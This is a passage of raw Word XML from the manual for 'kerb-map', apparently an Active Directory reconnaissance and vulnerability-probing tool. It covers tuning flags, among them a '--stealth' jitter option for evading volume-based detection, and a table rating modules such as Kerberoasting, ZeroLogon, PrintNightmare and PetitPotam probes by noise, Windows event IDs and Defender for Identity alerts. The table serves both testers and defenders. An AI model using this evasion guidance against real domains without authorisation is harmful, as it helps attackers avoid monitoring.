        <w:t>8.4  Tuning</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07BE4" w14:paraId="054BED7D" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="36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4FB71E86" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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3F1AE18E" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="3D2FB47C"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CE29346" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>--stealth</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B38CD7B" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Add random 0.8-3.0s jitter between LDAP queries. Slower but less likely to trigger volume-based detection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="62E02FEF"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6A2BD9DA" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>--timeout N</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2F51741C" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>LDAP connection timeout in seconds (default: 10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4D9BD4E4" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E430C56" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc224561328"/>
      <w:r>
        <w:t>8.5  Scan History</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07BE4" w14:paraId="26D138C0" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="36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1D3D3375" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="576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20" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4FEBDEDA" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="41DA6FE2" w14:textId="77777777">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37AD246" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>--list-scans</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="57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9E1ADEE" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>List all scans stored in local cache. No network connection required.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="6CB9E876" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="36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74030492" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>--show-scan ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="576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20" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="32D33C37" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Display findings from a previous scan by its ID number.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3317F8F2" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B61BFA" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5C2B47" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_Toc224561329"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>9.  Detection Profile</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p w14:paraId="5CF4F405" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Understanding what noise kerb-map generates is essential for deciding how to operate. All detection information below assumes a well-monitored environment with a SIEM ingesting DC event logs and Microsoft Defender for Identity (MDI) deployed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C424A9E" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56357154" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="_Toc224561330"/>
      <w:r>
        <w:t>9.1  Noise Level by Module</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440"/>
        <w:gridCol w:w="2720"/>
        <w:gridCol w:w="2000"/>
      </w:tblGrid>
      <w:tr w:rsidR="00707BE4" w14:paraId="75B1685F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="32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5B498CDD" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="144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2FADE2F6" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Noise Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="272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3CE8C7B1" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Windows Events</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1A1A2E"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4941A05A" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>MDI Detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="0F9E38CD" w14:textId="77777777">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1FDEFE3" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>LDAP queries (all --safe CVEs, delegation, users)</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5E8962D" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>LOW</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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76D63DD2" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>1644 only if LDAP diag logging enabled</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40E9CB3" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="562366A5" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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3F5C5AC" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>SPN scan (no ticket request)</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6AD2FF9" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>LOW</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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7D165126" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>None by default</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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C341C02" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="474DEC3E" w14:textId="77777777">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725B3B1" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>AS-REP scan</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C6B486B" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>LOW</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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AC616C5" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>None by default</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4C6484F8" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="37BF3BDD" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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36CF1AD" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>AD CS template audit</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5802395" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>LOW</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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2FE1EBA3" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>None by default</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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919A442" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="49939BE8" w14:textId="77777777">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E68567E" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Kerberoasting with AES tickets</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43CAE502" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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59C05145" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>4769 per ticket request</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41FAB236" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="721E1D80" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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3ED0E866" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Kerberoasting with RC4 tickets</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6F707814" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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48BB8E1A" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>4769 (enc type 0x17 = red flag)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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E475894" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="7BE0035F" w14:textId="77777777">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085E9B62" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ZeroLogon RPC probe</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07BB706" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>MEDIUM-HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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5293268" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>5827 / 5828 on patched DCs</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687F6F5C" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="6A4A31DC" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="32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BEE4361" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>PrintNightmare pipe probe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="144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5E9BC16B" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="272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18581644" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>5145 (named pipe access)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F3F4"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="065AF3DE" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="437FA331" w14:textId="77777777">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3B67B730" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>PetitPotam EFS probe</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14EB865B" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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A8E0356" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>5145</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00" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2522CF83" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="10000055" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Encryption audit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="10000056" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>LOW</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="10000057" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1644 (if diag logging on)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="10000058"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10000059" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Trust mapping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2000002B" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>LOW</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2000002C" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1644 (if diag logging on)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2000002D"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2000002E" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>GPP Passwords (MS14-025)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2000002F" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>LOW</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
